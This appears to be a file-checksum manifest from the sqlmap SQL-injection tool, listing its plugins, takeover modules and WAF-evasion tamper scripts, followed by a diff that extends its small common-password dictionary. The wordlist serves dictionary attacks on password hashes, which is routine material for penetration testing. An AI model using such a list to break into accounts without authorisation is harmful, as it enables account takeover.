plugins/dbms/monetdb/__init__.py +a1cf9a8cd5e263d1e48dc8b5281febaf868ee91f1e0587dee915949fdb6da1ea plugins/dbms/monetdb/syntax.py +84d9f336ff3d75a1127c7f5ccda7bff6dac947d7d8bbeee2014e8a29b984a98d plugins/dbms/monetdb/takeover.py +545fbbb386ab7819261a3917d0f016d723dbced8e065945ba60271a73544c459 plugins/dbms/mssqlserver/connector.py +2895d14ead30d7ee4e1fdb29a8d1d059493ad60490ed2e9ff6cb9680257554cd plugins/dbms/mssqlserver/enumeration.py +89cbc49cd9113e9ba91be090f79c0384089d1bfed785ac8ee5b07f84309c74cb plugins/dbms/mssqlserver/filesystem.py +87a35cadd3fe4987f548f498c442f748cf1f37650fd1dcd8decd1455a90d675c plugins/dbms/mssqlserver/fingerprint.py +784d6065921a8efbba970864a2cb2e0ef1dd1fcea7181cfc3f737bbfa18f0574 plugins/dbms/mssqlserver/__init__.py +79a887b5a2449bb086805560ff0ec2a2304dd142f47450ae9c2f88cf8bda9ac9 plugins/dbms/mssqlserver/syntax.py +bb0edf756903d8a9df7b60272541768102c64e562e6e7a356c5a761b835efde3 plugins/dbms/mssqlserver/takeover.py +9a1a69416af5a3fc60b93dd8a80fb23b3f190fe96f2564f170df2edeb5bb3599 plugins/dbms/mysql/connector.py +1e29529d6c4938a728a2d42ef4276b46a40bf4309570213cf3c08871a83abdc1 plugins/dbms/mysql/enumeration.py +200b2c910e6902ef8021fe40b3fb426992a016926414cbf9bb74a3630f40842d plugins/dbms/mysql/filesystem.py +b7aa7bf8b1f9ba38597bae7fc8bf436b111eeb5ee6a4ad0a977e56dca88a4afc plugins/dbms/mysql/fingerprint.py +88daad9cf2f62757949cb27128170f33268059e2f0a05d3bd9f75417b99149de plugins/dbms/mysql/__init__.py +20108fe32ae3025036aa02b4702c4eda81db01c04a2e0e2e4494d8f1b1717eca plugins/dbms/mysql/syntax.py +91f34b67fe3ad5bfa6eae5452a007f97f78b7af000457e9d1c75f4d0207f3d39 plugins/dbms/mysql/takeover.py +125966162396ef4084d70fac1c03e25959a6ccebacd8274bda69b7bebf82b9d5 plugins/dbms/oracle/connector.py +8866391a951e577d2b38b58b970774d38fb09f930fa4f6d27f41af40c06987c1 plugins/dbms/oracle/enumeration.py +5ca9f30cd44d63e2a06528da15643621350d44dc6be784bf134653a20b51efef plugins/dbms/oracle/filesystem.py +b1c939e3728fe4a739de474edb88583b7e16297713147ca2ea64cac8edf2bdf5 plugins/dbms/oracle/fingerprint.py +53fe7fc72776d93be72454110734673939da4c59fecdf17bbbc8de9cdc52c220 plugins/dbms/oracle/__init__.py +39611d712c13e4eb283b65c19de822d5afa4a3c08f12998dd1398725caf48940 plugins/dbms/oracle/syntax.py +cd3590fbb4d500ed2f2434cf218a4198febb933793b7a98e3bb58126839b06f1 plugins/dbms/oracle/takeover.py +9ca6fccb27cac0037103db6f05b561039c9f6bd280ab2fb87b76e4d52142c335 plugins/dbms/postgresql/connector.py +3ebc81646f196624ec004a77656767e4850f2f113b696f7c86b5ca4daf0ee675 plugins/dbms/postgresql/enumeration.py +760285195bdfd91777066bf2751c897f87fab1ada24f729556b122db937c7f88 plugins/dbms/postgresql/filesystem.py +42fbf2707e9f67554571e63ef2d204d28303e4d25eb7781ec800084fb53324ce plugins/dbms/postgresql/fingerprint.py +4c76ebe0369647f95114a7807e08cd0821d3f5b7159a3ec659d33ef8175163f7 plugins/dbms/postgresql/__init__.py +04f8ce5afb10c91cfb456cf4cce627b5351539098c4ddfeb63311a55951ac6b0 plugins/dbms/postgresql/syntax.py +33f5a6676380cdd4dfbe851b5945121399a158a16ad6b6760b931aa140a353e2 plugins/dbms/postgresql/takeover.py +ba4c83075ac870473ca91144641c18bc2ca1bf7d7ef5593e4666d95dc9f659d3 plugins/dbms/presto/connector.py +5b8a46ac204080f1a357dac634330449020d122b4bf84e1c1e9618dc88a8e8a6 plugins/dbms/presto/enumeration.py +3d65033809b919f6ec53ef93f9cdc2b35304014bc261e5c06b26ab52ded9b4c2 plugins/dbms/presto/filesystem.py +cb0eb626dc3467e6adbba46f382f9a370397736312f5b50d39593ce3b84bd01c plugins/dbms/presto/fingerprint.py +90e5500ad15c12394c6bf684d1b85085d6ddad9d2bc2df6ccb2b11be3e21940f plugins/dbms/presto/__init__.py +3d69cd5d416090ef9fbdcfa7e563721e1575e4bef03a4ee45e17e6bd14deb449 plugins/dbms/presto/syntax.py +ffd5471d633ecc4bd55ba3674819aec0602ba92812c191d4c1dc468a3263a9f5 plugins/dbms/presto/takeover.py +c122c48253d90a312962dd48ed47847d86df2b199e34133b70ec78d7b385179b plugins/dbms/raima/connector.py +aeeedd464149ad6cfc0dab35b7c7b096a186b4b7ea02641ffa92306d1789f36c plugins/dbms/raima/enumeration.py +3bcd38e900e7c8b53bcbd62dad03f8fa5df04910d96b09115e670302c80b61fc plugins/dbms/raima/filesystem.py +e5b680e2668313a8b3d4567e2394b557a7db407c4f978f63a54c41b8d786d4b1 plugins/dbms/raima/fingerprint.py +48a9d1576247b555ed6d910b047f757dea10242ddeb19c7a69a6183a4724dc27 plugins/dbms/raima/__init__.py +9899a908eb064888d0e385156395d0436801027b2f4a9846b588211dc4b61f83 plugins/dbms/raima/syntax.py +543949cee45ae5cfb36ad38a82666f211d4f8d0ecf224c6ebb13a8d2455441e1 plugins/dbms/raima/takeover.py +3038aa55150688855fb4ea5017fe3405a414f2cf4a7630764b482d02f7442b25 plugins/dbms/sqlite/connector.py +6736ff9995db5675bb82bf2014117bdc5ce641f119b79763edb7aa983443ec87 plugins/dbms/sqlite/enumeration.py +e75cf970d5d76bc364d2fd02eab4086be6263d9c71fa5b44449bada158cd87d3 plugins/dbms/sqlite/filesystem.py +d9a17f49a99b715187e12635a202c5a487e71ef2e6877116d5bc9eb4a0d28eee plugins/dbms/sqlite/fingerprint.py +9b00c84f7b25b488a4cbb45fe9571e6661206771f1968f68badc0c670f042a0b plugins/dbms/sqlite/__init__.py +5457814ccacf9ca75ae6c39f1e615dd1ca63a8a2f21311f549f8a1df02d09634 plugins/dbms/sqlite/syntax.py +3aeb29f4486bd43b34afe58f581cb19a9932cabc87888416d2e383737b690072 plugins/dbms/sqlite/takeover.py +210da495985643e1952edac123f4b0b963545ecb4c10ce7b9421e8ae101d37b7 plugins/dbms/sybase/connector.py +8fbdfd90b980cae6d86d9a4e193644655e0820885bb8d2c847930a1dfa7185d2 plugins/dbms/sybase/enumeration.py +cc237effd49ab53317d8d4b6fad41eef72de7e8f241d9264a65427846ff0c853 plugins/dbms/sybase/filesystem.py +3dabc716f6603b83767c579b9237352b9f4860110f83e47dc6b0d8720c6ca91d plugins/dbms/sybase/fingerprint.py +cf21209a5efb9ed2d1c682197f0cd12d514c8c38a7d629f4d66306da8975e300 plugins/dbms/sybase/__init__.py +87c27c7839d6bc4f7bc1dbe44eb7dcca9d2d68ee744f3e2edf6fac3e80f18088 plugins/dbms/sybase/syntax.py +3795dbe49e08fe6a9251ec6ce44e3c323138ffc38dfed93db35220b442faf03b plugins/dbms/sybase/takeover.py +b8adf2e7d9921ff47a4a15f58b4a8665995f5ea079e8843556a11995678a606e plugins/dbms/vertica/connector.py +c6d4c5bf1d6e3420e0b009e44b70f52db4a6d509451188ca9f7c2b0b73608080 plugins/dbms/vertica/enumeration.py +15f4f1d4be6cff468636557c2f8c0ac9988f6b639db20149ab3ea1c2bc5aedbe plugins/dbms/vertica/filesystem.py +2bc1e4f5b3465e776f377f9ede48de79ed588f74b3cbd12e17868440a4b09c1b plugins/dbms/vertica/fingerprint.py +40a381a9d3a2aeae08321390263d078d1e84212f13b7291ae09fc3b9c91f4cdf plugins/dbms/vertica/__init__.py +e2b7aad0f739b82eef819202d1543983bd461255e3a2ac7bb66849df75728e2a plugins/dbms/vertica/syntax.py +b57d7ae86b5531813aca7ffe11668b8a62ace3e2f8c69dbceca67fbf3cde42ee plugins/dbms/vertica/takeover.py +b17f7ce72b5aa061caf1d0f1fc3510b3a1fa6f382a2d7115ed76dcab271a7507 plugins/dbms/virtuoso/connector.py +a5aa977e1a20b0e8b57cd1369d3071812415904008d533190f00fd13cd26aec9 plugins/dbms/virtuoso/enumeration.py +7148d747b1e76b5c508180dc5a6015f39fdea047d7386784b8dc8a8dad965fd3 plugins/dbms/virtuoso/filesystem.py +01ef324069c3d0a5f50f2916654cdc5c283e59600863820cc55af9d928a55325 plugins/dbms/virtuoso/fingerprint.py +6e355c60fbb131d1190d993732198989f3d17db21cb3b55edaaf586d49cd6807 plugins/dbms/virtuoso/__init__.py +3d69cd5d416090ef9fbdcfa7e563721e1575e4bef03a4ee45e17e6bd14deb449 plugins/dbms/virtuoso/syntax.py +f00e5d1d8ddedcb7980b442d5cabf8bf1c7783c289e32c57a7107f37a3fb40a5 plugins/dbms/virtuoso/takeover.py +25ed1b975dd09a9224056a02e1f7997512da13eb1aa45222cb817928c681f474 plugins/generic/connector.py +b333c73c6a490b5930a09c6c09951af1044eb97076446b2f1475c7cfdfc838a6 plugins/generic/custom.py +4a923f52e8d2dfa6b55c16e08fd5f64eeb292b99573030c0397c7292a4032dd3 plugins/generic/databases.py +9b0dbf8f77f190ca92cc58e9c5f784d0b30276ee7d99906f6d9c826c23b6d2e1 plugins/generic/entries.py +783a17bb5188b6b9f4a73dbf10d5cf5c073144d5c1970a9d4aec27cb828e2356 plugins/generic/enumeration.py +5dbcb646c03b43d1f26c0dbd17ae8fb537fdc526ca9984e1cc3e9eae12c38e6e plugins/generic/filesystem.py +ab661b605012168d72f84a92ff7e233542df3825c66714c99073e56acea37e2e plugins/generic/fingerprint.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 plugins/generic/__init__.py +9ec577d8ccf4698d4e7834bf1e97aea58fba9d2609714b7139c747bcc4f59a30 plugins/generic/misc.py +546486bd4221729d7d85b6ce3dbc263c818d091c67774bd781d7d72896eb733b plugins/generic/search.py +9be0e2f931b559052518b68511117d6d6e926e69e463ddfa6dc8e9717c0ca677 plugins/generic/syntax.py +7bb6403d83cc9fd880180e3ad36dca0cc8268f05f9d7e6f6dba6d405eea48c3a plugins/generic/takeover.py +115ee30c77698bb041351686a3f191a3aa247adb2e0da9844f1ad048d0e002cd plugins/generic/users.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 plugins/__init__.py +baaf7a29a1fe07e7cecc7fb1b1f6a6f327b12154b8d5619e9808b2cf43ad2198 README.md +535ab6ac8b8441a3758cee86df3e68abec8b43eee54e32777967252057915acc sqlmapapi.py +168309215af7dd5b0b71070e1770e72f1cbb29a3d8025143fb8aa0b88cd56b62 sqlmapapi.yaml +4121621b1accd6099eed095e9aa48d6db6a4fdfa3bbc5eb569d54c050132cbbf sqlmap.conf +515893a1105f06afb6e91d7a32d89ed350828244f2a4c638d36240b284a61363 sqlmap.py +82caac95182ac5cae02eb7d8a2dc07e71389aeae6b838d3d3f402c9597eb086a tamper/0eunion.py +bc8f5e638578919e4e75a5b01a84b47456bac0fd540e600975a52408a3433460 tamper/apostrophemask.py +c9c3d71f11de0140906d7b4f24fadb9926dc8eaf5adab864f8106275f05526ce tamper/apostrophenullencode.py +fa18d565b7b6b1000942414d65aea762b20632079ed3e1a96fe1005f81fccf07 tamper/appendnullbyte.py +627573bd838cba4c0b688b401ecbc11a15969bd6ded0d2d7e838d622ffe40b99 tamper/base64encode.py +5714dddccd9a94238e58737f8b2ee1a272100037a8360342080f865cc7aa3a4d tamper/between.py +e8964badea5a1026da0e67e2b810297e4d2e45c64aee5192d2c5979feae93e69 tamper/binary.py +6dce750c7eb79ddc8743d44233045e7804a4191c9523614e8ee187f1696bb655 tamper/bluecoat.py +4186cf796e0b62c6de81902c33139abd9091725567f49b0f198a1f890f3b9d82 tamper/chardoubleencode.py +71077c3a28ba68d91baa538e08ca3ba55107f607618269261a0dc0858918b236 tamper/charencode.py +60ba0b3d985394a962daa097faa31afb80d5ba93dbd495104a519559386c7350 tamper/charunicodeencode.py +5ec4038bd71c806b903086ad1e099f72c319c7a3b31c4cdf91c97d1fb9d0bdd7 tamper/charunicodeescape.py +9ad1ee5f134e0fa4f3b16b3622e66f212ffd658b099ef75eaaa96d7a63c2fc2e tamper/commalesslimit.py +b28bbe837dc70b935143650d907832038aaec19595a93de96d68131c830e2490 tamper/commalessmid.py +b94713ce6a47d810dd699a480e14e0fd6e6095778d74e5a69e867440ddb1ce66 tamper/commentbeforeparentheses.py +beb5d4129badba301e0cad26652b05af9220921fd99e72c8d5789c2f75c7f171 tamper/concat2concatws.py +cd86b89c63932b7ce204cd80c6d0141ac4bb564b8ea5d1b9eb24a8407431f50f tamper/decentities.py +252a97217f6d3ddd227a1e997cd30f8e0fdc21e235e23307e2bdee96a110c4c6 tamper/dunion.py +853de839258e9137b252fb61429e7353ea9f8b555d050244333836bd99981324 tamper/equaltolike.py +a50b70dd62ee00896c46581d81b1b51bedcec303cb5df2f6c6d98c2817608650 tamper/equaltorlike.py +89803e274257d906e7472a91e60ea0fd0fb4a846eb68dd66b73d298a81a88ee1 tamper/escapequotes.py +e65a98f6b043401fc0b37c821ef9a459e476df33f9dc885756f08c711b4045a1 tamper/greatest.py +a7c656e8a2e09541f435931266c6c9fb20b0cf868f70fb77bff0402e73150a56 tamper/halfversionedmorekeywords.py +af421c0f873e76c2f7182310066d16c7bf14bdda0e79b0eb3cf07be0eca234ed tamper/hex2char.py +4e5d509fb552f92b70f48346df07987ebd7380f92b419d5316b72d07a172b037 tamper/hexentities.py +ae95bef04799cd112e81e8527b88669092996243ce161df85ded36fcda188ae6 tamper/htmlencode.py +fa34e56b7b6578a4611973f273dabac7532672188f2b14a5a68504abb4873d40 tamper/if2case.py +392f14be8826c59cbace4f4ef4e02f3b4c9fa85892aa2c33b8bf9ec8bb67bda5 tamper/ifnull2casewhenisnull.py +3a4679f864cffab5f0d0b60a0d0ffdba4adfaba489c07f019d83e0d911dedd1e tamper/ifnull2ifisnull.py +d22f2208649ffc72e2a80f464eacbe35157e1ebebe7889ae9aea3748116a96b7 tamper/informationschemacomment.py +4608f21a4333c162ab3c266c903fda4793cc5834de30d06affe9b7566dd09811 tamper/__init__.py +5fb731d9c0340bd97bc6f647325cf624e7387ae44ce5920ae14c47d007ceb7ea tamper/least.py +a108d0943a17e5e9d3e256ed58a9e1a15327286c6d5a63bf6aad276fb28216ef tamper/lowercase.py +19a1ef76b21931a5e688771a341dc46325129414badc0fbf8c6e35fcce2bd7c0 tamper/luanginxmore.py +f85b74c64441d038198da6b569c050aafd3a0575504c6d0d07d09cdca663692a tamper/luanginx.py +2f1819436c68d2bbb69380508becf8660bddc2cab9349d30c46b0ab727ba7dec tamper/misunion.py +6a2d6cf5d7dc6eb838d0ea8a8e5748db14dd8a415fad0994ab0f05bfe87ed5a5 tamper/modsecurityversioned.py +712a2f7a8f68d16bc77a5e8772098f168207a6815b71a027c2f241655d616102 tamper/modsecurityzeroversioned.py +458fbf5ae865f3b3de237790de1f7045a820d409649a244c8cc2402fa9582c21 tamper/multiplespaces.py +d8e049d1c0b4273bb6cee844767503a60f97301a7041e5c8b51cb0557c413d28 tamper/ord2ascii.py +cf7a99f5a4d6df30b1b8c0df55eb6e950077ec14b31062dd21d2c2d924d58d74 tamper/overlongutf8more.py +381b5fc6fdda0cd287dd6bf2d098c318fab8f42f5ae3ec4e774e864bf57fd51d tamper/overlongutf8.py +965636cef15f4b5d1ce2d802e1be8b51025ee95f96b58ae0131340945e9c7026 tamper/percentage.py +97b6c357c42308fa76d93d271824e53f436fceb33f9a7e74acc8b91da3abb7f4 tamper/plus2concat.py +d49fd12b78fb6f38c4a31c9c7badaf11f65600127783ebb4e941ab0ed2284489 tamper/plus2fnconcat.py +2edf00005991d6546c0ddcab103451ae9425c177bc5519d16b2a78e3e308ec71 tamper/randomcase.py +3259e9189a5d3c2ab476653bc65e45dc481f7541d2688cc8041281ce57205681 tamper/randomcomments.py +8abd8df65c852011a73ffe69febce52f2d383cdb947a70de0ddb2a0f1272e6f6 tamper/schemasplit.py +fc90359a31849c890399f146e5f26edf78f6729cabe022cc49748835a870c16c tamper/scientific.py +387236175825c1651bbf353e7a5553417da9898e60c6e32b302c214ca4ac583f tamper/sleep2getlock.py +8de7553f15e7ecee5f0da426829dcd73397889645cb43fc9c47d9e5f122c9524 tamper/space2comment.py +a958305e53d9ca98014918c415d0671e46ca45c6a32762c379e96ab946e75db0 tamper/space2dash.py +3e99a94e0712906558e346b97d3fdad4e9b349b58f7273e6f9340333774eb71a tamper/space2hash.py +f5eb72cc564abba171a881fd8b8335bc19efc8333396575db8f18ce0ca8d1e9f tamper/space2morecomment.py +2b6ec63af32b6a71c5de288e1d507d49513b9690a9c0c79b85e13aba1caabf23 tamper/space2morehash.py +e434ba59a2a68c273a407d99762bf71d08f3b5876efacc9ef1c06d655d5fa7bb tamper/space2mssqlblank.py +0795280f1264b9d2a92ea1017a30c3299fac00403ab35f8110fca173bfdee206 tamper/space2mssqlhash.py +26faeb39842c3770d0f59d871325eb9a59ea29e5f43cfab2872edc7a947a3d73 tamper/space2mysqlblank.py +50365aa886349a268ce39820af2b68d2b119bbfca53e97dbdbadb7296f8f4ce6 tamper/space2mysqldash.py +e5a8d49f6985e27d2d0aebf1227a1d22dea11a4852ccf6ab7fa5e9c84c79a88c tamper/space2plus.py +c8debf71c17719ea4f3c2f07596fcf3f9972f9b4ef70ae25893a1bd5bed8655c tamper/space2randomblank.py +409214cfca98144ce28805ab65ff365189e398e9e9eabb709d1bc00ae7eb36c9 tamper/sp_password.py +de34e24d47e84a0079665ff0253fdafac3d7b1444ae6429735fce1cecaba54c7 tamper/substring2leftright.py +0b50c760a4c08d547a8f86234d9f40bfeb0311d81f342ab08c8a9c0f1cdf2e85 tamper/symboliclogical.py +5a56f752f1276a4f60b442d7e13aa55d58f71dcc0113a1a849831a9b658cab20 tamper/unionalltounion.py +a096122382135668beb66eecf266b77e616695021ee973d0301afe1098fd3ecd tamper/unmagicquotes.py +c48f6dc142fbf062254494e4c41b62852f26095f10d01be85140d5fd836d98d3 tamper/uppercase.py +b88ff93aeb9da9c4c056c6df94e94b798a860ce01846ae2a01962edf9f3ff794 tamper/varnish.py +1219349c2c9fafa21e36dce8bdb5f0be52bd0b6e3d8af6233fe571239543c46b tamper/versionedkeywords.py +6a006674d9e5dba780f6a81897e762b7da36dc259bf3775d392a562574cae7b5 tamper/versionedmorekeywords.py +40c03cf396bc5a090b04f7588b9012ce4de29fc0eceb0ef5e0f7e687d5d11c08 tamper/xforwardedfor.py +55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py +dfb8a36f58a3ae72c34d6a350830857c88ff8938fe256af585d5c9c63040c5b2 thirdparty/beautifulsoup/beautifulsoup.py +7d62c59f787f987cbce0de5375f604da8de0ba01742842fb2b3d12fcb92fcb63 thirdparty/beautifulsoup/__init__.py +0915f7e3d0025f81a2883cd958813470a4be661744d7fffa46848b45506b951a thirdparty/bottle/bottle.py +9f56e761d79bfdb34304a012586cb04d16b435ef6130091a97702e559260a2f2 thirdparty/bottle/__init__.py +0ffccae46cb3a15b117acd0790b2738a5b45417d1b2822ceac57bdff10ef3bff thirdparty/chardet/big5freq.py +901c476dd7ad0693deef1ae56fe7bdf748a8b7ae20fde1922dddf6941eff8773 thirdparty/chardet/big5prober.py +df0a164bad8aac6a282b2ab3e334129e315b2696ba57b834d9d68089b4f0725f thirdparty/chardet/chardistribution.py +e9b0eef1822246e49c5f871af4881bd14ebd4c0d8f1975c37a3e82738ffd90ee thirdparty/chardet/charsetgroupprober.py +2929b0244ae3ca9ca3d1b459982e45e5e33b73c61080b6088d95e29ed64db2d8 thirdparty/chardet/charsetprober.py +558a7fe9ccb2922e6c1e05c34999d75b8ab5a1e94773772ef40c904d7eeeba0f thirdparty/chardet/codingstatemachine.py +3ca4f31e449bb5b1c3a92f4fcae8cc6d7ef8ab56bc98ca5e4130d5b10859311c thirdparty/chardet/compat.py +4d9e37e105fccf306c9d4bcbffcc26e004154d9d9992a10440bfe5370f5ff68c thirdparty/chardet/cp949prober.py +0229b075bf5ab357492996853541f63a158854155de9990927f58ae6c358f1c5 thirdparty/chardet/enums.py +924caa560d58c370c8380309d9b765c9081415086e1c05bc7541ac913a0d5927 thirdparty/chardet/escprober.py +46e5e580dbd32036ab9ddbe594d0a4e56641229742c50d2471df4402ec5487ce thirdparty/chardet/escsm.py +883f09769d084918e08e254dedfd1ef3119e409e46336a1e675740f276d2794c thirdparty/chardet/eucjpprober.py +fbb19d9af8167b3e3e78ee12b97a5aeed0620e2e6f45743c5af74503355a49fa thirdparty/chardet/euckrfreq.py +32a14c4d05f15b81dbcc8a59f652831c1dc637c48fe328877a74e67fc83f3f16 thirdparty/chardet/euckrprober.py +368d56c9db853a00795484d403b3cbc82e6825137347231b07168a235975e8c0 thirdparty/chardet/euctwfreq.py +d77a7a10fe3245ac6a9cfe221edc47389e91db3c47ab5fe6f214d18f3559f797 thirdparty/chardet/euctwprober.py +257f25b3078a2e69c2c2693c507110b0b824affacffe411bbe2bc2e2a3ceae57 thirdparty/chardet/gb2312freq.py +806bc85a2f568438c4fb14171ef348cab9cbbc46cc01883251267ae4751fca5c thirdparty/chardet/gb2312prober.py +737499f8aee1bf2cc663a251019c4983027fb144bd93459892f318d34601605a thirdparty/chardet/hebrewprober.py +62c3f9c1096c1c9d9ab85d516497f2a624ab080eff6d08919b7112fcd23bebe6 thirdparty/chardet/__init__.py +be9989bf606ed09f209cc5513c730579f4d1be8fe16b59abc8b8a0f0207080e8 thirdparty/chardet/jisfreq.py +3d894da915104fc2ccddc4f91661c63f48a2b1c1654d6103f763002ef06e9e0a thirdparty/chardet/jpcntx.py +d47a904bd3dbb678f5c508318ad24cbf0f17ea42abe4ea1c90d09959f110acf1 thirdparty/chardet/langbulgarianmodel.py +2ce0da8efb1eb47f3bc980c340a0360942d7507f3bb48db6ddd85f8e1f59c7d7 thirdparty/chardet/langcyrillicmodel.py +f18016edb53c6304896a9d2420949b3ccc35044ab31a35b3a9ca9fd168142800 thirdparty/chardet/langgreekmodel.py +2529ea984e44eb6b432d33d3bcba50b20e6038c3b83db75646f57b02f91cd070 thirdparty/chardet/langhebrewmodel.py +4616a96121b997465a3be555e056a7e6c5b4591190aa1c0133ad72c77cb1c8e0 thirdparty/chardet/langhungarianmodel.py +f25d35ef71aefd6e86f26c6640e4c417896cd98744ec5c567f74244b11065c94 thirdparty/chardet/langthaimodel.py +5b6d9e44d26ca88eae5807f05d22955969c27ab62aac8f1d6504e6fccd254459 thirdparty/chardet/langturkishmodel.py +4b6228391845937f451053a54855ad815c9b4623fa87b0652e574755c94d914f thirdparty/chardet/latin1prober.py +011f797851fdbeea927ef2d064df8be628de6b6e4d3810a85eac3cb393bdc4b4 thirdparty/chardet/mbcharsetprober.py +87a4d19e762ad8ec46d56743e493b2c5c755a67edd1b4abebc1f275abe666e1e thirdparty/chardet/mbcsgroupprober.py +498df6c15205dc7cdc8d8dc1684b29cbd99eb5b3522b120807444a3e7eed8e92 thirdparty/chardet/mbcssm.py +2c34a90a5743085958c149069300f6a05c4b94f5885974f4f5a907ff63e263be thirdparty/chardet/sbcharsetprober.py +d48a6b70207f935a9f9a7c460ba3016f110b94aa83dec716e92f1823075ec970 thirdparty/chardet/sbcsgroupprober.py +208b7e9598f4589a8ae2b9946732993f8189944f0a504b45615b98f7a7a4e4c4 thirdparty/chardet/sjisprober.py +a8bd35ef8952644e38d9e076d679e4b53f7f55c0327b4ee5685594794ae3b6d6 thirdparty/chardet/universaldetector.py +21d0fcbf7cd63ac07c38b8b23e2fb2fdfab08a9445c55f4d73578a04b4ae204c thirdparty/chardet/utf8prober.py +b29dc1d3c9ab0d707ea5fdcaf5fa89ff37831ce08b0bc46b9e04320c56a9ffb8 thirdparty/chardet/version.py +1c1ee8a91eb20f8038ace6611610673243d0f71e2b7566111698462182c7efdd thirdparty/clientform/clientform.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/clientform/__init__.py +162d2e9fe40ba919bebfba3f9ca88eab20bc3daa4124aec32d5feaf4b2ad4ced thirdparty/colorama/ansi.py +a7070aa13221d97e6d2df0f522b41f1876cd46cb1ddb16d44c1f304f7bab03a3 thirdparty/colorama/ansitowin32.py +d7b5750fa3a21295c761a00716543234aefd2aa8250966a6c06de38c50634659 thirdparty/colorama/initialise.py +f71072ad3be4f6ea642f934657922dd848dee3e93334bc1aff59463d6a57a0d5 thirdparty/colorama/__init__.py +fd2084a132bf180dad5359e16dac8a29a73ebfd267f7c9423c814e7853060874 thirdparty/colorama/win32.py +179e47739cdcb6d8f97713b4ecf2c84502ed9894d20cf941af5010a91b5275ea thirdparty/colorama/winterm.py +4f4b2df6de9c0a8582150c59de2eb665b75548e5a57843fb6d504671ee6e4df3 thirdparty/fcrypt/fcrypt.py +6a70ddcae455a3876a0f43b0850a19e2d9586d43f7b913dc1ffdf87e87d4bd3f thirdparty/fcrypt/__init__.py +dbd1639f97279c76b07c03950e7eb61ed531af542a1bdbe23e83cb2181584fd9 thirdparty/identywaf/data.json +5aa308d6173ad9e2a5006a719fdbfe8c20d7e14b6d70c04045b935e44caa96d0 thirdparty/identywaf/identYwaf.py +edf23e7105539d700a1ae1bc52436e57e019b345a7d0227e4d85b6353ef535fa thirdparty/identywaf/__init__.py +d846fdc47a11a58da9e463a948200f69265181f3dbc38148bfe4141fade10347 thirdparty/identywaf/LICENSE +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/__init__.py +879d96f2460bc6c79c0db46b5813080841c7403399292ce76fe1dc0a6ed353d8 thirdparty/keepalive/__init__.py +f517561115b0cfaa509d0d4216cd91c7de92c6a5a30f1688fdca22e4cd52b8f8 thirdparty/keepalive/keepalive.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/magic/__init__.py +4d89a52f809c28ce1dc17bb0c00c775475b8ce01c2165942877596a6180a2fd8 thirdparty/magic/magic.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/multipart/__init__.py +2574a2027b4a63214bad8bd71f28cac66b5748159bf16d63eb2a3e933985b0a5 thirdparty/multipart/multipartpost.py +ef70b88cc969a3e259868f163ad822832f846196e3f7d7eccb84958c80b7f696 thirdparty/odict/__init__.py +9a8186aeb9553407f475f59d1fab0346ceab692cf4a378c15acd411f271c8fdb thirdparty/odict/ordereddict.py +691ae693e3a33dd730930492ff9e7e3bdec45e90e3a607b869a37ecd0354c2d8 thirdparty/prettyprint/__init__.py +8df6e8c60eac4c83b1bf8c4e0e0276a4caa3c5f0ca57bc6a2116f31f19d3c33f thirdparty/prettyprint/prettyprint.py +3739db672154ad4dfa05c9ac298b0440f3f1500c6a3697c2b8ac759479426b84 thirdparty/pydes/__init__.py +4c9d2c630064018575611179471191914299992d018efdc861a7109f3ec7de5e thirdparty/pydes/pyDes.py +c51c91f703d3d4b3696c923cb5fec213e05e75d9215393befac7f2fa6a3904df thirdparty/six/__init__.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/socks/__init__.py +7027e214e014eb78b7adcc1ceda5aca713a79fc4f6a0c52c9da5b3e707e6ffe9 thirdparty/socks/LICENSE +57dba7460c09b7922df68b981e824135f1a6306180ba4c107b626e3232513eff thirdparty/socks/socks.py +e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/termcolor/__init__.py +b14474d467c70f5fe6cb8ed624f79d881c04fe6aeb7d406455da624fe8b3c0df thirdparty/termcolor/termcolor.py +4db695470f664b0d7cd5e6b9f3c94c8d811c4c550f37f17ed7bdab61bc3bdefc thirdparty/wininetpton/__init__.py +7d7ec81c788600d02d557c13f9781bb33f8a699c5a44c4df0a065348ad2ee502 thirdparty/wininetpton/win_inet_pton.py diff --git a/data/txt/smalldict.txt b/data/txt/smalldict.txt index 55fe63bd61d..20828f97f08 100644 --- a/data/txt/smalldict.txt +++ b/data/txt/smalldict.txt @@ -1,20 +1,27 @@ -!@#$% -!@#$%^ -!@#$%^& -!@#$%^&* +! * ***** ****** ------ +: +????? +?????? +!@#$% +!@#$%^ +!@#$%^& +!@#$%^&* +@#$%^& +$HEX 0 -0.0.0.000 -0.0.000 0000 +0.0.000 00000 +0.0.0.000 000000 0000000 00000000 +0000000000 0000007 000001 000007 @@ -56,12 +63,15 @@ 0racle8i 0racle9 0racle9i +!~!1 1 +100 1000 100000 1001 100100 1002 +100200 1003 1004 1005 @@ -79,6 +89,7 @@ 1017 1018 1020 +10203 102030 1022 1023 @@ -89,23 +100,28 @@ 1028 1029 102938 +1029384756 1030 1031 1066 10sne1 1101 +110110 1102 1103 1104 +111 1111 11111 111111 1111111 11111111 1111111111 +111111a 11112222 1112 111222 +111222tianya 1114 1115 1117 @@ -115,9 +131,11 @@ 112211 112233 11223344 +1122334455 1123 112358 11235813 +1123581321 1124 1125 1129 @@ -164,27 +182,49 @@ 1234321 12344321 12345 +123451 +1234512345 1234554321 123456 +1234560 +1234561 1234567 12345678 123456789 1234567890 +1234567891 12345678910 123456789a 123456789q +12345678a 12345679 +1234567a 123456a +123456aa +123456abc +123456b +123456c +123456d +123456j +123456k +123456l +123456m 123456q +123456s +123456t +123456z 123457 12345a 12345q 12345qwert +12345qwerty +12345t 1234abcd 1234qwer 1235 123654 123654789 +123698745 123789 123987 123aaa @@ -192,7 +232,12 @@ 123asd 123asdf 123go +123hfjdk147 123qwe +123qwe123 